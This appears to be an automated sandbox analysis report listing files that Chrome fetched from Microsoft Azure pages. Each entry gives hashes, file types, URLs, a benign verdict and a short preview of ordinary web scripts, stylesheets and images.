                                                                        URL:https://cdn.botframework.com/botframework-webchat/latest/webchat.js
                                                                        Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x1080, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):85264
                                                                        Entropy (8bit):7.997126461488898
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:845C108A6981D30ABD99A6FE6757E08C
                                                                        SHA1:74AAA29222F51998A36AD65C7264C97445C2F91C
                                                                        SHA-256:4FC2670B859FBE47E946D434F9F80C6B78A16C56024C653104E55DA8C69F6B4C
                                                                        SHA-512:9DAFDA7740937C333BFCC587D4C9FA8D89A458D41E19E38D7E5D071347FCCADF8C7BE7B0896B096D47002079D37EC8668D92C7D012F8C640F806309A64934FC5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.M..WEBPVP8 .L.......*..8.>E".E..%*"2)!@..gn..g.`.......`.>ki..... .z.ow...:?.n_..y../....C..?..k>.?.._.@..~.......O...=..W.6.^nm.......?._..+..}f.................?..........3..._.........{....._..t?.|n..z..`..........C......?.......~'.....?......................s..5?.............K.....................B.............7.....~......~.~5...O...g.w.?..........w...6.l<.^.......j.M...0#........_C...J.6....,.O.....}...Mi....0.\[.4..1m...h:=.7.Y....^.....5...v..J....l?.15v.p(..*@..|..*...X..J.D.A.J)n..z..7.c.4y..9.......Qc.L...&.N.r.+.:...3.N..3P....X......yc....m.-...p.G...m.S.C%%.>.p..^&..<.&b......h7w...V.}..RT..ON+...6|7dQT|6...PQ>..i.`......g$y...3b.R.rA.....aS..3.H.6v.+!@.6....../...#*...P8-g.P.N7..9d.*U'.cz.<....^.#.l..k_...C.....of..G.P.|.....,`..LU..W..N.u..|...F...;.........l.i..^M.P..+.b\n....d..!......y.:..'.z...n.T..6...xI.."....B.SP%.56.m........tm*Xs.k5}.h..hq.qt"g.n...g...X..E.uK.......\.{.Q.....$.W.t..@.M.......^y.C'cVe...}!..^.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (29322), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):29322
                                                                        Entropy (8bit):5.312522003173338
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:89416F80A433C105701781826A74BB42
                                                                        SHA1:ACDF202A6B4D286A220DCFF7A8639F7E4B44F043
                                                                        SHA-256:940AF9F2B22109831E80014BF6071CBD08F67E9623804A9B19A0467589046D9A
                                                                        SHA-512:678D7A9013A50631427EF68555C4C0A34A9DA850CBB3FBF8CE25FDEEBFB38077A4E461A05C5B19BAC30AB62DEEC813534A5210D9A0F3A40DD1CABB433C7D41E9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lpcdn.lpsnmedia.net/le_re/3.61.0-release_1396603402/jsv2/UISuite.js?_v=3.61.0-release_1396603402
                                                                        Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lpAnimate={_V:"1.2",name:"lpAnimate",elements:{},queue:{},conf:{interval:13,duration:500,easing:"swing"},init:function(t){if(t)for(var e=0;e<t.length;e++)this.conf[t[e].id]=t[e].value},_supported:{opacity:function(){var t=document.createElement("div");return t.style.cssText="opacity:.1",/^0.1/.test(t.style.opacity)}()},_regExp:{alphaFilter:new RegExp("alpha\\([^)]*\\)","i"),opacityInAlphaFilter:new RegExp("opacity=([^)]*)")},_cssPropHooks:{opacity:{get:function(t){return this._supported.opacity?parseFloat(t.style.opacity):this._regExp.opacityInAlphaFilter.test(t.style.filter)?.01*parseFloat(RegExp.$1):null},set:function(t,e){var n;this._supported.opacity?t.style.opacity=e:(n=t.style.filter||"",e="alpha(opacity="+100*e+")",n=this._regExp.alphaFilter.test(n)?n.replace(this._regExp.alphaFilter,e):n+" "+e,t.style.filter=n)}}},_cssNumber:{zIndex:!0,fontWeight:!0,opacity:!0,zoom:!0,lineHeight:!0,color:!0},_easing:{li
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):154478
                                                                        Entropy (8bit):7.998039491048002
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:1B4A541FD1A40628AEBF1FB6644B8F5C
                                                                        SHA1:EA068609A07F0D3D2041CAC5570F433C3477F008
                                                                        SHA-256:54C31ACCC418514147F19278DE85217038BC032FD56CB7816B7FFEE8ED3851B8
                                                                        SHA-512:D0B27EBB4D69A01236877BD39009FB83264766224287979287F297C969DE9AD7B43403B91D64F6A59D832A56148A7D7B28DF7DB297A10E4167B1295E33FA865D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-cardcarousel-featurednews-card1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=832&hei=357&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............,..YB.............w...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...e....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma........................Y.mdat.....&3.#..2j...$P.?\h.Y.2....W.:Y.B...p..:......L..:.../ .q.$...b..=......V.<b.1H.g.`z...O..GM.b.>g3J.,..w=.........&3.#..4..2...D...5;...N4.@.f.E?.6H....q&NZm ..s...t."[...'pH..".I.c.....z....2O.tG;.&..ay.."...~.ha..Od%....t..{.z........o..........U.:Q...#..<......A..O.S...((.....iFx?#.-e..=.Z...O.R...%Sa..........."...l}.}e....E.........?C..'.G.....<J...s.%B...6.ple.'@....Eo..;a.,z.N/i.g..$e.....L..J7.....1;Z.t!./.....Z5PZ..........ug...o.A.}e.j.n.....C....w.......%.M.q....#..{.{{N......GR6t..:..8.7..m.v!.z_...Jf...2..#f...?....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):203
                                                                        Entropy (8bit):4.6712092041548265
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                        SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                        SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                        SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                        Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):4565
                                                                        Entropy (8bit):7.879534543139402
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                        SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                        SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                        SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C++ source, ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3116
                                                                        Entropy (8bit):4.431505373285771
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                        SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                        SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                        SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-localstorage.min.ACSHASHb884ef4864d6867bd00aa4a7a5cfb368.js
                                                                        Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (47691)
                                                                        Category:downloaded
                                                                        Size (bytes):47692
                                                                        Entropy (8bit):5.401573598696506
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B0B3774E70E752266B4CF190E6D95053
                                                                        SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                        SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                        SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):125017
                                                                        Entropy (8bit):7.998446816256156
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:072C2F8364DEC9B516500C27683E0028
                                                                        SHA1:A2916CABB24535950CDB018E0A722AFEA53B25E1
                                                                        SHA-256:A8A405EF05BB32324D09FA17D31EAC8C282DF5E72D087D2112E415DD2CA4A216
                                                                        SHA-512:06EBB2C19BD6E4B8E6A07689AD5D4499DBE94789F98B9B9E9C0BB9BC5C2C564B175F9AF0CEFFDCFE3B1966798894F50F78B5106F2C2F776A39DC187FB59F3714
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-cardgrid-productandservices-bg?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=1024&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................?...(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma..................Gmdat.....*q.......2...D........1..JP.+..t...u..E..._9.`..xE|..H..jimNa....|.%........s.[Z+.5P..o.L..t!..... [...CPc].....U..a...,.z.W...E...5....,..`.1F.......J....wY..HR|O.(.`.<.a....F9.C...-.MO.uG7.]..]T.)i.6.-._......%^..Y2.C.`...5.=.#.+..}..1.I.KSrM...X.....H`....5..o........i.....}.}...nm.P.P{....P.|.#.,x...'r.].Q$...q~.G....%.N. ...\+=..Z7../..R2.%.-.,."....u..`.4.t....?v.S9..^!.........R.T.b`.V........."..^Z+w........L;.2...( 8.F.0....MD.}.l^7..7.B.5{_>y.......0.....\...s..<yU..h.^$.u...x.ok........E|.]..e..E@...(Kz..V..~..ci0......i}.U.E.f.g......g.SB{.....c.2....4.-..n...r...A..1.....~e;........mr...."./A."..|4.}fC.......'9..?....... j..\O...6..)......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (931), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):931
                                                                        Entropy (8bit):5.870929051831436
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:61BB1D83E4E4AECD6BC23206BF23B033
                                                                        SHA1:ABE6ACF291ABC2101F8B9B913051A7DDEC2A16CF
                                                                        SHA-256:617BCC13B05C41A27BDCAB13BD49CB42DCCB714A6660DDCD92F11317E132F93A
                                                                        SHA-512:2F4568C53595D5B600DBBCD8198FD82E33E853FF69015D127BFB4DC7662B5A2E73FBD02D792E8992DEAD7A78D022B136381A22C2DA2CD3CA36A31FB7365EB069
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(()=>{if(!document.querySelector("#lp-origin-trial")){var i=document.createElement("meta");i.id="lp-origin-trial";i.httpEquiv="origin-trial";i.content="A77GUxMF2gPljjeX2xdlt25iXAGDqu3SWLRaxp24NcNGz++ZE9fkggbPexLArxAguTbk/8W5OtGUm5ki+fqC0wMAAACSeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=";document.head.append(i)}if(!document.querySelector("#lp-origin-trial-2")){i=document.createElement("meta");i.id="lp-origin-trial-2";i.httpEquiv="origin-trial";i.content="A2t91t+aauUx3llVKUfxbR2uQKP2Thff9JfAXeVYED6Sv31GOcqWZkJpcG+y9Cg2vfnTtPYXjBK9hzq5DyXyVgAAAACTeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9";document.head.append(i)}})();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x936, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):82524
                                                                        Entropy (8bit):7.997523031378953
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:AC76D98B7255A2BEC25B76CCE1ACA4A9
                                                                        SHA1:9547B6C343F29A6AC54F60D3333D786DA6626DDC
                                                                        SHA-256:65F278E098FB95462E7CA9D4DDE21D29AA8EE2D7CA2AC7FCAD5B81C36EF2A552
                                                                        SHA-512:1EEC31E519CAD7F7BF84A2E4D4ED7F6EF628E90D1B3261623B8C55DD679F125FB4518861DD47C4028F97BCD40D15455E41D6A06E2A5C26BA31BC07B840AEB509
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFTB..WEBPVP8 HB..0....*....>-..C..".!.i...gC ..q.x..|t."...N..\.Y~.yfl?..9............{....o...J...tg.2..........0....!.....w.~............A....._...?.|....../.............M.........G..........u...T...3.w.g..._....7.._.}N.p....~......../...k..f.F....../..x..'.?......W.#/.....?.?5.3...?.^w.o......._..[.{...RW.)...#|!..H..y7..........l......e@c'..Z."..m..............2.....J.V.s......M..E...y......../9.K....}...8..,.d=...p.....DreT?.:..a-a...b..-........".<L.....:.t..\f...fX..'.12.9...~......w..j$83.{.B...=...".J..~*.a.x. ..(....S!.y.n..c=K....e<.7...\zWy...c....%.P`n.............+\..:.@...P\....K..:.0..v...3.{......7iY'.....I.9j.B..`..s..P..+".G.'~".....O.DQ4...A.....C(w...4.[%...)U[.p.].y)...(/....{..%...W.y.W....%-..............lZplN0S.....d..-5..W2.}....l....D.j.<.......KG.p.K.#.(.......~E(.......I.Y...;1:.....(..".C.S.~...Z.4...l..."....)8O.........".....C.]]l...wf.*1.9.. .K.C..8.W.9.(.K.f.S...."#.$...s.(...7.. .J!/x..Y.],...$G!n...+...d
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):21
                                                                        Entropy (8bit):3.689703732199547
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5DA2A3FC880852D94D30E1C36942DA64
                                                                        SHA1:1FBA3A8452490F92741EAB2E2E264672459C25D7
                                                                        SHA-256:5BD3941594A0DB01B025F43A66AA85DEBFBC8EA6B708040095F388EE1656750C
                                                                        SHA-512:30640E214E98366335EF218FC14664D5EAFAEFEFD079904C77CE09109001AA90C793BCCE0E4505D1A6049AD39B11B4F9D3B3C76FF9302706C5D0B12BC3C176FC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"ip":"8.46.123.175"}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                        Category:downloaded
                                                                        Size (bytes):419611
                                                                        Entropy (8bit):4.980054379765907
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                        SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                        SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                        SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH3cb55a1b7e29cabded7d23377524b55e.js
                                                                        Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (1818)
                                                                        Category:downloaded
                                                                        Size (bytes):185145
                                                                        Entropy (8bit):5.263515273204495
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8F54371F05BC32A5CBCF5D92B52B9432
                                                                        SHA1:E48D06AB8E24219379EB8936C15CCA6DACB68BB3
                                                                        SHA-256:977046592B00D4B3569B963B568C06C557E58E9BD806D2D68A37E9561E2114C5
                                                                        SHA-512:D423C6B105B776AC7CB213841EC5B5B97D42A3E13F848A28AC8BBD88847C07ABF44F7D3B8ABEB01E8D32FA5667336C6F4199E715CB33EF32A0CF75DF1F963F68
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://publisher.liveperson.net/iframe-le-tag/iframe-cs.html?lpsite=60270350&lpsection=azure-leadgen-en-us&buttons=lpChatAzure
                                                                        Preview:<!DOCTYPE html>.<html lang='en'>.<head> ..<title>iFrame Cart Page</title>..<meta charset='utf-8'>..<meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>..<meta name="format-detection" content="telephone=no"/>....<meta name='viewport' content='width=device-width, height=device-height, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no'/>...<style>.../*Empty MR3*/...body {....background-image:url('https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_75.gif');....background-repeat: no-repeat;....background-attachment: fixed;....background-position: center;....background-color: #f2f2f2;....margin: 0;...}....@font-face {....font-family: "Segoe UI";....src: url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format('woff');...}......* {....font-family: "Segoe UI", Arial, sans-serif !important;...}....body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {....colo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):9849
                                                                        Entropy (8bit):4.327507698755054
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                        SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                        SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                        SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH08c5f9cb4220e78ff920dae3a7a8ed53.js
                                                                        Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (655)
                                                                        Category:dropped
                                                                        Size (bytes):476830
                                                                        Entropy (8bit):5.504913141773882
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:48DD3E22F922821879E06AFDBBAE1B13
                                                                        SHA1:C9A299AB783C87C782F3C1C18ADC861486615F19
                                                                        SHA-256:40FBF03763120106011C15B2970BC3F8E3BCA1B58878E79CC3303E6B92496D31
                                                                        SHA-512:5F3ABC05096D0E691C248D18F44224F07D97F927B6C1DB1BC2D7F003A80BCD4377B2ECFA47A5F1DF4F061C13AF3E8E28F56F66FA6F41BC561A5EA144B91620E8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*. OneCloud Reimagine v0.308.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):979182
                                                                        Entropy (8bit):7.990547230670371
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:C559504A8447B113F1B7DCEA16862388
                                                                        SHA1:06ECDAEADEFC3A0321B9AB0A042C7EF4CCF41AC0
                                                                        SHA-256:33D254DAA5070A83625CC1E35783FC3837371ED6F23813A5F94645525D735599
                                                                        SHA-512:20F953425FF081C899D17B722E9BDE9CC4F22FB41412537F86213B21DB05768BDF9955D0982BC8D1DA9CC9889BADEC2257269738DCEC7893BF3ADAF6429F6A39
                                                                        Malicious:false
                                                                        Reputation:unknown
